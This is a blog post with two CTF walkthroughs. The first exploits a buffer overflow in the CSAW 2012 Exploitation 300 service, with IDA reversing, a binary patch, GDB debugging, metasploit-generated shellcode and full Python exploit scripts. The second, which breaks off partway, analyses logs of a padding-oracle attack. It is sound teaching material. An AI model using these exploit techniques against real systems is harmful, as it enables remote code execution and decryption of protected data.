聊天 – CSAW Exploitation 300

This challenge covers many of the basics involved in reverse engineering and exploit development, so I think it’s a great candidate for a step-by-step walkthrough of service exploitation, assuming you know the concepts but may be inexperienced with the tooling.

We can start the service, then run netstat to see that it listens on TCP port 4842, but it doesn’t look like we can interact with it very much without figuring out what its requirements are.

root@bt:~/Desktop/csaw_2012/300# ./2012_csawexp300 &
[1] 3046
root@bt:~/Desktop/csaw_2012/300# netstat -pantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      2985/sshd       
tcp        0      0 127.0.0.1:7337          0.0.0.0:*               LISTEN      937/postgres    
tcp        0      0 0.0.0.0:4842            0.0.0.0:*               LISTEN      3046/2012_csawexp30
tcp        0      0 10.81.154.50:22         10.81.152.113:58183     ESTABLISHED 2987/4          
tcp        0      0 127.0.0.1:4842          127.0.0.1:34863         TIME_WAIT   -               
tcp6       0      0 :::22                   :::*                    LISTEN      2985/sshd       
tcp6       0      0 ::1:7337                :::*                    LISTEN      937/postgres    
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1105/dhclient3  
udp6       0      0 ::1:36573               ::1:36573               ESTABLISHED 937/postgres    
root@bt:~/Desktop/csaw_2012/300# nc localhost 4842
连接接受。
无法获取用户密码输入: liaotian.
root@bt:~/Desktop/csaw_2012/300#

Also, don’t forget to disable ASLR.


root@bt:~/Desktop/csaw_2012/300# echo '0' > /proc/sys/kernel/randomize_va_space 

At the moment, we’re not sure what the service is supposed to do or how to run it properly, so we’ll reverse it a bit to learn how it works. If you’re reversing with IDA, when you open the ELF file, you’re dropped into the program’s entry point.

Getting to main is accomplished by double-clicking the function (sub_804884F) in the push instruction just before the call to __libc_start_main. It’s a good idea to rename (with ‘n’) any function whose purpose you learn as you go, to make navigation easier and to keep track of what you’ve already looked at.

Inside main we have a few calls to other functions. It turns out that for this binary only the first one is important to us. The rest just set up the service’s connection handling and so on, and since we already know what port it listens on, we don’t need to investigate them further.

Stepping into the first function that is called (double click sub_8048A3D), we see code that just sets up various signals. Whenever I encounter any libc function that I don’t remember the specifics of, it’s always useful to take a look at the man page to be reminded of what parameters it expects.

root@bt:~/Desktop/csaw_2012/300# man signal 7

--------------

SIGNAL(2)                                                  Linux Programmer's Manual                                                  SIGNAL(2)

NAME
       signal - ANSI C signal handling

SYNOPSIS
       #include <signal.h>

       typedef void (*sighandler_t)(int);

       sighandler_t signal(int signum, sighandler_t handler);

DESCRIPTION
       The  behavior  of  signal() varies across Unix versions, and has also varied historically across different versions of Linux.  Avoid its
       use: use sigaction(2) instead.  See Portability below.

       signal() sets the disposition of the signal signum to handler, which is either SIG_IGN, SIG_DFL, or the address of a  programmer-defined
       function (a "signal handler").

Signal takes two arguments, a number and a handler. Looking at our disassembly, 3 signals are set up. Since signals will be raised by signums which may not be easy to remember, it might be useful to keep track of signum/function mappings for programs that have many.
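One lightweight way to keep such a table is a few lines of Python. This is only a sketch: signum_name and the handlers dictionary are names made up for illustration, and the only entry filled in is the one this walkthrough states explicitly (signum 1Fh, which the disassembly ties to sub_80488C8). On x86 Linux, 1Fh is SIGSYS.

```python
import signal


def signum_name(signum):
    """Return the symbolic name of a signal number on this platform."""
    try:
        return signal.Signals(signum).name
    except ValueError:
        return "unknown"


# Hypothetical notes table: signum -> handler name as shown in IDA.
# Only the mapping stated in the walkthrough is filled in here.
handlers = {0x1F: "sub_80488C8"}

for signum, handler in sorted(handlers.items()):
    print("%2d (0x%02X) %-8s -> %s" % (signum, signum, signum_name(signum), handler))
```

Add the other two handlers once you have read their signum arguments off the push instructions before each call to signal.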

Analyzing the first handler (sub_8048834), we see it simply prints a message then calls exit.

This probably won’t be critical for our purposes; if we see this signal being raised, we probably did something wrong and caused the program to terminate. (Note, IDA won’t display Chinese characters correctly without installing an add-on or using one of the more recent pro versions.) Hitting <Esc> takes us back to where we were with the signals, and diving into the next handler (sub_804898C) shows a more interesting function.

The string “liaotian” is set as the argument to sub_8048BC0, and analyzing that function shows calls to getpwnam, setgroups, setgid, setuid, seteuid, setegid, and chdir. This function just sets the service up to run as the liaotian user, which is why we weren’t able to use it before: the error we got from netcat translates roughly to “Unable to get the password entry for user: liaotian.” After creating the liaotian user, we can use the service.

root@bt:~/Desktop/csaw_2012/300# ./2012_csawexp300 &
[1] 3204
root@bt:~/Desktop/csaw_2012/300# nc localhost 4842
连接接受。
这部分并不难,但我希望你有乐趣。如果你给我大量的数据,它可能是一件坏事会发生.
信号读取。

Despite the hint in the Chinese message above that this contains an overflow (it reads roughly “This part isn’t hard, but I hope you have fun. If you give me a lot of data, something bad might happen.”), we saw a fork earlier in our disassembly, so we won’t notice a crash in the service if we start sending it data now. Jumping back to IDA, if we look at the next function call after the service is set up (sub_80488E0), we see the code for the service’s response we just observed while connecting to it.

After sending us some strings, the signal (signum 1Fh) is raised. Hitting <Esc> twice in IDA (or clicking on the signal setup function if you’ve been diligent in renaming your functions as you learn what they do) takes us back to the signal setup, where we see that signum 1Fh refers to the third signal handler.

The function sub_80488C8 calls another function sub_804889E which uses read().

root@bt:~/Desktop/csaw_2012/300# man read 7

----------

READ(2)                                         Linux Programmer's Manual                                        READ(2)

NAME
       read - read from a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t read(int fd, void *buf, size_t count);

DESCRIPTION
       read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.

       If  count  is zero, read() returns zero and has no other results.  If count is greater than SSIZE_MAX, the result
       is unspecified.

So read() will copy up to N bytes from a file descriptor (a socket in our case) into a destination buffer. According to IDA, 348 bytes (15Ch) are allocated on the stack for local variables (like dest_buffer), while up to 2048 bytes (800h) are read from the socket, so we have a buffer overflow.

Now that we know what our attack needs to do, we can make debugging the exploit we’re about to write easier by removing the call to fork from the service. (# man fork 7)

If you click on any instruction, IDA displays its offset in the file in the lower left corner.

By opening the binary in a hex editor and going to that offset, we can NOP out the three outlined instructions, starting at offset 99B. If we were to only NOP out the call to fork, the “test eax, eax” immediately after would always fail. I used HxD (Hexedit) on Windows, but if you’re in BackTrack, ‘bless’ is a good choice that does basically the same thing. In HxD, use the CTRL + G shortcut to go to an offset and enter 99B (the value we got from IDA), which takes us to the call to fork. 0xE8 is the opcode for ‘call’.

Instruction lengths vary, so to make sure we don’t NOP out too few or too many bytes, we could either look up the file offset in IDA of each instruction up to the mov instruction following our target area, or figure out what the encoded instructions look like using something like metasploit’s nasm_shell.rb. Failing that, we could find the opcodes using Google/Bing/Ask Jeeves.

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./nasm_shell.rb 
nasm > call 0xffffffff
00000000  E8FAFFFFFF        call dword 0xffffffff
nasm > test eax, eax
00000000  85C0              test eax,eax
nasm > 

Make the changes by writing NOPs (0x90) over these instructions and save the image (I named it nofork-2012_csawexp300).
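If you would rather script the patch than use a hex editor, something like the following would do it. This is a minimal sketch: nop_out and patch_file are hypothetical helper names, and the number of bytes to overwrite is deliberately left as a parameter. The call is 5 bytes and the test is 2 bytes (per nasm_shell.rb above), but the length of the third instruction has to be read from IDA before you pick a total.

```python
NOP = 0x90


def nop_out(image, offset, length):
    """Return a copy of image with length bytes at offset replaced by NOPs."""
    if offset < 0 or length < 0 or offset + length > len(image):
        raise ValueError("patch range falls outside the file")
    patched = bytearray(image)
    patched[offset:offset + length] = bytes(bytearray([NOP]) * length)
    return bytes(patched)


def patch_file(src, dst, offset, length):
    """Read src, NOP out the given range, and write the result to dst."""
    with open(src, "rb") as handle:
        data = handle.read()
    with open(dst, "wb") as handle:
        handle.write(nop_out(data, offset, length))


# Example call (the length value is yours to fill in from IDA):
# patch_file("2012_csawexp300", "nofork-2012_csawexp300", 0x99B, length)
```

Writing to a new file rather than patching in place keeps the original binary around for comparison.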

Opening the new image in IDA confirms our edit. But note that you’ll need to reanalyze the file to see these changes since IDA’s db will still show the old instructions otherwise.

Before we finish with IDA, let’s also take note of the address where the read() is performed. We’ll save that for later when debugging our exploit. Recall that clicking an instruction gives us its offset in the file, but IDA also shows the virtual address just to the right of where the offset is displayed. The address we’re interested in is 080488BC.

Observing a triggered segfault is now pretty easy. The rest of the process is now exploit development.

Let’s start our service in GDB and see what happens when we connect to it and send it our overflow payload of “A”s.

Since GDB will alert us whenever the signals are raised, just type ‘c’ to continue.

If we set our breakpoint in GDB with the address of the read, we can take a look at the memory before the crash. Use the ‘nexti’ command to go to the next instruction and examine memory again to find our “A”s (0x41) and see where in memory our payload is.

(gdb) break *0x80488BC
Breakpoint 1 at 0x80488bc
(gdb) r
Starting program: /root/Desktop/csaw_2012/300/nofork-2012_csawexp300 
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).


Program received signal SIGUSR1, User defined signal 1.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
连接接受。

Program received signal SIGSYS, Bad system call.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
信号读取。

Breakpoint 1, 0x080488bc in ?? ()
(gdb) x/150x $esp
0xffffc900:	0x00000006	0xffffc916	0x00000800	0x00000000
0xffffc910:	0x00000000	0x00000000	0x00009528	0x00009528
0xffffc920:	0x00000005	0x00001000	0x00000001	0x00009ee8
0xffffc930:	0x0000aee8	0x0000aee8	0x000001cc	0x000003e4
0xffffc940:	0x00000006	0x00001000	0x00000002	0x00009efc
0xffffc950:	0x0000aefc	0x0000aefc	0x000000e0	0x000000e0
0xffffc960:	0x00000006	0x00000004	0x00000004	0x00000134
0xffffc970:	0x00000134	0x00000134	0x00000044	0x00000044
0xffffc980:	0xffffc9b8	0x00000010	0xf7fdc000	0xf7f26f93
0xffffc990:	0xf7fbcff4	0xf7ecee64	0x00000001	0xf7fdc000
0xffffc9a0:	0x00000010	0xf7fbd4e0	0xffffffff	0xffffffff
0xffffc9b0:	0xf7fbd4e0	0xf7fdc000	0xffffc9e4	0xf7eceaef
0xffffc9c0:	0xf7fbd4e0	0xf7fdc000	0x00000010	0x00000014
0xffffc9d0:	0x00000003	0x00554e47	0xf7fbcff4	0x00000010
0xffffc9e0:	0x0000000f	0xffffc9f4	0xf7ecee06	0x00000010
0xffffc9f0:	0xf7fbd4e0	0xffffca18	0xf7ecf928	0xf7fbd4e0
0xffffca00:	0xf7fdc000	0x00000010	0x0000000a	0xf7fbcff4
0xffffca10:	0xf7fbd4e0	0x0000000f	0xffffca30	0xf7ed209a
0xffffca20:	0xf7fbd4e0	0x0000000a	0xf7fbcff4	0xf7fbe360
0xffffca30:	0xffffca58	0xf7ec5acb	0xf7fbd4e0	0x0000000a
0xffffca40:	0x0000000f	0xf7e668d0	0xf7fbd4e0	0x00000e04
0xffffca50:	0x00000000	0xf7fbcff4	0xffffd128	0x080488dc
0xffffca60:	0x08048e23	0x00000000	0x00000006	0x0804d6c8
0xffffca70:	0xf7fb0006	0xf7fef0a0	0xf7fcb239	0xf7fdf400
0xffffca80:	0x0000001f	0x00000063	0x00000000	0x0000002b
0xffffca90:	0x0000002b	0xf7fbcff4	0x00000000	0xffffd128
0xffffcaa0:	0xffffd110	0x00000e04	0x0000001f	0x00000e04
0xffffcab0:	0x00000000	0x00000001	0x00000000	0xf7fdf430
0xffffcac0:	0x00000023	0x00000296	0xffffd110	0x0000002b
0xffffcad0:	0xffffcd5c	0x00000200	0x00000000	0x0804d5d8
0xffffcae0:	0x00000003	0x0804d060	0x00000000	0x00000000
0xffffcaf0:	0x00000001	0x0000078a	0x0804d6c8	0xf7fde9e0
0xffffcb00:	0xf7fcaaec	0xf7e73eb0	0xf7fca71c	0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) nexti
0x080488c1 in ?? ()
(gdb) x/150x $esp
0xffffc900:	0x00000006	0xffffc916	0x00000800	0x00000000
0xffffc910:	0x00000000	0x41410000	0x41414141	0x41414141
0xffffc920:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc930:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc940:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc950:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc960:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc970:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc980:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc990:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9a0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9b0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9c0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9d0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9e0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffc9f0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca00:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca10:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca20:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca30:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca40:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca50:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca60:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffca70:	0x41414141	0xf7fef00a	0xf7fcb239	0xf7fdf400
0xffffca80:	0x0000001f	0x00000063	0x00000000	0x0000002b
0xffffca90:	0x0000002b	0xf7fbcff4	0x00000000	0xffffd128
0xffffcaa0:	0xffffd110	0x00000e04	0x0000001f	0x00000e04
0xffffcab0:	0x00000000	0x00000001	0x00000000	0xf7fdf430
0xffffcac0:	0x00000023	0x00000296	0xffffd110	0x0000002b
0xffffcad0:	0xffffcd5c	0x00000200	0x00000000	0x0804d5d8
0xffffcae0:	0x00000003	0x0804d060	0x00000000	0x00000000
0xffffcaf0:	0x00000001	0x0000078a	0x0804d6c8	0xf7fde9e0
0xffffcb00:	0xf7fcaaec	0xf7e73eb0	0xf7fca71c	0x00000000

If we started developing our exploit now, we’d soon find that the 348 bytes we assumed for the destination buffer of the read() call is inaccurate, and we’d get a segfault despite thinking we’re overwriting the return address. The buffer is actually a bit smaller than 348 bytes; that is, the stack has 348 bytes reserved for local variables, but they’re not all for dest_buffer. One trick for finding the actual distance to the return address is metasploit’s pattern_create and pattern_offset tools. pattern_create generates a long non-repeating string that we use to fill memory; when a piece of that string later shows up in a register or memory location we care about, we feed it back to pattern_offset to learn how far into the string it was. Let’s generate a pattern that is 350 bytes in length, send it to our service, and see what happens in GDB.

root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 
Usage: pattern_create.rb length [set a] [set b] [set c]
root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb  350
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al

------------------

(gdb) r
Starting program: /root/Desktop/csaw_2012/300/nofork-2012_csawexp300 
warning: the debug information found in "/lib/ld-2.11.1.so" does not match "/lib/ld-linux.so.2" (CRC mismatch).


Program received signal SIGUSR1, User defined signal 1.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
连接接受。

Program received signal SIGSYS, Bad system call.
0xf7fdf430 in __kernel_vsyscall ()
(gdb) c
Continuing.
信号读取。

Program received signal SIGSEGV, Segmentation fault.
0x396b4138 in ?? ()
(gdb) 

------------------

root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 0x396b4138
326
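If metasploit isn’t handy, the same idea is easy to reproduce. The sketch below is a re-implementation written for this post, not metasploit’s code: it assumes the default character sets (uppercase, lowercase, digit) that produce the Aa0Aa1Aa2... string above, and the function names simply mirror the tool names.

```python
import string
import struct


def pattern_create(length):
    """Build an Aa0Aa1Aa2... style pattern, truncated to length characters."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value, length=8192):
    """Find where a 32-bit little-endian register value occurs in the pattern."""
    needle = struct.pack("<I", value).decode("ascii")
    return pattern_create(length).find(needle)


# EIP at the time of the crash, as reported by GDB above.
print(pattern_offset(0x396b4138, 350))  # 326
```

The value 0x396b4138 is the four characters “8Ak9” read in little-endian order, which is why the lookup packs the integer before searching.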

The offset to the saved return address is 326 bytes, so that is our effective buffer length. We’re ready to write our exploit. I picked a return address on the stack inside our buffer (0xffffc990). If you have issues with the address you pick, keep in mind that memory can be laid out differently depending on whether you start a program from within a debugger or not. You can always attach to the running process from within GDB using its PID (attach 12345). Our shellcode can be generated with msfpayload. I don’t think there are any bad characters to worry about, since read() copies raw bytes and won’t stop early based on their contents. Our shellcode will just execute a command to create a flag file to demonstrate RCE.
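The 326 figure can be cross-checked against the first GDB dump. The sketch below assumes two things read off that dump: that the second word on the stack at the breakpoint (0xffffc916) is the buffer pointer passed to read(), and that the word 0x080488dc stored at 0xffffca5c is the saved return address. The constant names are made up for illustration, and the 60-byte shellcode size is the one used in the exploit.

```python
import struct

BUF_ADDR = 0xffffc916        # buffer pointer passed to read() (second stack word)
SAVED_RET_ADDR = 0xffffca5c  # slot holding 0x080488dc before the overflow (assumed saved EIP)
RET_TARGET = 0xffffc990      # return address picked in the text
SHELLCODE_LEN = 60           # size of the msfpayload shellcode

# Distance from the start of the buffer to the saved return address.
offset = SAVED_RET_ADDR - BUF_ADDR

# The NOP sled fills everything before the shellcode.
sled_end = BUF_ADDR + (offset - SHELLCODE_LEN)
in_sled = BUF_ADDR <= RET_TARGET < sled_end

# The return address as it must appear in the payload (little-endian).
ret_bytes = struct.pack("<I", RET_TARGET)

print(offset, hex(sled_end), in_sled, ret_bytes)
```

Under those assumptions the subtraction agrees with pattern_offset, and the chosen return address lands inside the NOP sled rather than in the shellcode itself.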

root@bt:/opt/metasploit/msf3# ./msfpayload linux/x86/exec CMD="/usr/bin/touch /tmp/flag" y
# linux/x86/exec - 60 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependChrootBreak=false, AppendExit=false, 
# CMD=/usr/bin/touch /tmp/flag
buf = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x19\x00\x00" +
"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63" +
"\x68\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x61\x67\x00\x57\x53" +
"\x89\xe1\xcd\x80"

Our exploit:

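import socket

# Offset from the start of the buffer to the saved return address
buffersize = 326

# Byte-string literals and print() keep this runnable on Python 2.6+ and 3
shellcode = (
# msfpayload: /usr/bin/touch /tmp/flag
b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +
b"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x19\x00\x00" +
b"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63" +
b"\x68\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x61\x67\x00\x57\x53" +
b"\x89\xe1\xcd\x80"
)

# NOP sled fills the space in front of the shellcode
nops = b"\x90" * (buffersize - len(shellcode))
# 0xffffc990 in little-endian byte order
ret = b"\x90\xc9\xff\xff"
payload = nops + shellcode + ret

s = socket.socket()
s.connect(('localhost', 4842))
s.recv(1024)  # read the banner before sending
s.sendall(payload)
s.close()
print("Sent")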

Running this exploit gives us some discouraging results: our shellcode seems to fail. After talking to Rich, it turns out that since our shellcode sits so close to ESP, there can be interference: the shellcode pushes data onto the stack as it runs, and those pushes can overwrite the shellcode itself. The trick he showed me (in addition to using nasm_shell.rb) is to just move ESP somewhere else. We’ll add one instruction to the beginning of our shellcode to do this, then update our exploit:

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./nasm_shell.rb 
nasm > add esp, -450
00000000  81C43EFEFFFF      add esp,0xfffffe3e
nasm > 

----------

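import socket

# Offset from the start of the buffer to the saved return address
buffersize = 326

# Byte-string literals and print() keep this runnable on Python 2.6+ and 3
shellcode = (
# add esp, -450 (move ESP away from the shellcode before it starts pushing)
b"\x81\xC4\x3E\xFE\xFF\xFF" +

# msfpayload: /usr/bin/touch /tmp/flag
b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +
b"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x19\x00\x00" +
b"\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x74\x6f\x75\x63" +
b"\x68\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x61\x67\x00\x57\x53" +
b"\x89\xe1\xcd\x80"
)

# NOP sled fills the space in front of the shellcode
nops = b"\x90" * (buffersize - len(shellcode))
# 0xffffc990 in little-endian byte order
ret = b"\x90\xc9\xff\xff"
payload = nops + shellcode + ret

s = socket.socket()
s.connect(('localhost', 4842))
s.recv(1024)  # read the banner before sending
s.sendall(payload)
s.close()
print("Sent")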
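The six bytes prepended to the shellcode can also be rebuilt by hand, which is handy if you want to try a different displacement. This is a small sketch: add_esp_imm32 is a hypothetical helper name, and it only covers the 32-bit immediate form that nasm emitted above (opcode 81 followed by C4 for ESP).

```python
import struct


def add_esp_imm32(delta):
    """Encode 'add esp, imm32' with a signed 32-bit immediate."""
    return b"\x81\xc4" + struct.pack("<i", delta)


# -450 is stored as the two's-complement value 0xfffffe3e, little-endian.
print(add_esp_imm32(-450) == b"\x81\xc4\x3e\xfe\xff\xff")  # True
```

A negative delta moves ESP to lower addresses, so the shellcode’s pushes land well below the buffer instead of on top of it.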

Our result:


Oracle Padding Attack Challenge

A friend of mine sent me a crypto challenge from an online course he was taking that I had a lot of fun solving. The details are available here. If you’re unfamiliar with how oracle padding attacks work or think they pertain to Oracle (proper noun), you should check out the following references and try to solve the challenge prior to reading the rest of this post.

http://esec-lab.sogeti.com/post/2010/12/03/Padding-Oracle-attack-and-its-applications-on-ASP.NET

http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html

For this challenge, we’re given web server logs that appear to show an attacker exploiting this vulnerability. Our objective: to capture the secret data.

The logs show someone brute forcing bytes to determine when their guess results in correct padding. In oracle padding attacks, the attacker needs to figure out what the indicator for a successful guess is. Sometimes it’s a different page response, but in this case, it’s a 404 HTTP response code. This lets us reduce the amount of log data we need to pay attention to, since every 403 is just an incorrect guess and can be ignored.

$ egrep ' 404' proj4-log.txt 
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020202020202020eddbcac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020deecdacac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020ffd9ebddcac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020202020fbfed8eadccac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020202089f8fddbe9dfcac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /2020202020202020203c88f9fcdae8decac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020207c3387f6f3d5e7d1cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020057d3286f7f2d4e6d0cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
...
...

We’ll come back to this later, but for now we can see the pattern where each byte is progressively, individually brute forced. We also notice the attacker has divided the original 80-byte encrypted string into five 16-byte blocks and has prepended a starting block of 20’s to target the padding oracle specifically. Most block ciphers divide data into 8- or 16-byte blocks, so this makes sense.

To more easily see what’s going on, we can split up the string into 16-byte chunks, which show the attacker’s initial guesses. I’ve deliberately added spaces to the GET snippets throughout the rest of this write-up to make visualization easier.

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202001 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202000 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202003 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /20202020202020202020202020202002 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
…
…
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
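Splitting the requests by hand gets tedious, so here is a rough sketch of doing it in Python. It assumes every log line has exactly the shape shown in the excerpts (a hex-only path followed by HTTP/1.1 and a three-digit status); LOG_RE, split_blocks, and parse_line are names made up for this example.

```python
import re

# Matches the request path and status code in lines shaped like the excerpts.
LOG_RE = re.compile(r'"GET /([0-9a-f]+) HTTP/1\.1" (\d{3})')


def split_blocks(hex_string, block_bytes=16):
    """Split a hex string into blocks of block_bytes bytes each."""
    step = block_bytes * 2  # two hex characters per byte
    if len(hex_string) % step != 0:
        raise ValueError("length is not a multiple of the block size")
    return [hex_string[i:i + step] for i in range(0, len(hex_string), step)]


def parse_line(line):
    """Return (blocks, status) for a log line, or None if it does not match."""
    match = LOG_RE.search(line)
    if match is None:
        return None
    return split_blocks(match.group(1)), int(match.group(2))


line = ('1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8'
        'cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404')
blocks, status = parse_line(line)
print(status, " ".join(blocks))
```

For each request, the first block is the attacker’s forged block and the second is the ciphertext block under attack.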

Though slightly out of order, the attacker tried 01, 00, 03, 02, and so on, continuing to step through values for the last byte until hitting the 404 response code: the successful padding guess. The first 404 (first line of our egrep) reveals the request that guessed the correct value to supply so that the decrypted last byte would be 0x01:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404

This means that when 0xd8 is supplied as the last byte of the forged block, the last byte of the decrypted plaintext comes out as 0x01 and the padding is valid. So if we XOR 0xd8 with 0x01, we get 0xd9, the intermediate value for that byte. We can now make that byte decrypt to anything we like by supplying the desired value XORed with 0xd9.

>>> hex(0xd8 ^ 0x01)
'0xd9'

Now that we know 0xd9, we can guess that the attacker moved on to brute forcing the next byte to find out when the padding is correct for two bytes. To do that, the attacker needs to make the decrypted value come out to 0x02 0x02. We can do that only for the last byte ourselves since we know 0xd9:

>>> hex(0xd9 ^ 0x02)
'0xdb'

If we look at the raw logs to the line right after the initial successful guess, we see the attacker changes the last byte from 0xd8 to 0xdb and the brute force attack for the next byte begins:

1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202020d8 cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 404
1.1.1.1 - [Sat Mar 31 18:20:41 2012] "GET /202020202020202020202020202002db cac544d7942e50e1a0afa156c803d115 HTTP/1.1" 403
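The bookkeeping the attacker is doing between rounds can be sketched in a few lines. The helper names below (recover_intermediate and forge_suffix) are invented for this example; the byte values come from the first three 404 lines in the egrep output, whose forged blocks end in d8, eddb, and deecda.

```python
def recover_intermediate(guess, pad_len):
    """A guess that yields valid padding reveals the intermediate byte."""
    return guess ^ pad_len


def forge_suffix(intermediates, pad_len):
    """Bytes to send so the already-known positions decrypt to pad_len."""
    if len(intermediates) != pad_len - 1:
        raise ValueError("need exactly pad_len - 1 known intermediate bytes")
    return bytes(bytearray(i ^ pad_len for i in intermediates))


# Round 1: guess 0xd8 gave valid padding 0x01.
last = recover_intermediate(0xd8, 0x01)            # 0xd9
# Round 2: fix the last byte so it decrypts to 0x02, then brute force the next.
print(forge_suffix(bytearray([last]), 2) == b"\xdb")  # True
# Round 2 succeeded with 0xed, so the next intermediate byte is 0xed ^ 0x02.
second = recover_intermediate(0xed, 0x02)          # 0xef
# Round 3: both known bytes must now decrypt to 0x03.
print(forge_suffix(bytearray([second, last]), 3) == b"\xec\xda")  # True
```

Both results match the trailing bytes of the logged requests, which is a nice confirmation that we are reading the attacker’s strategy correctly.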

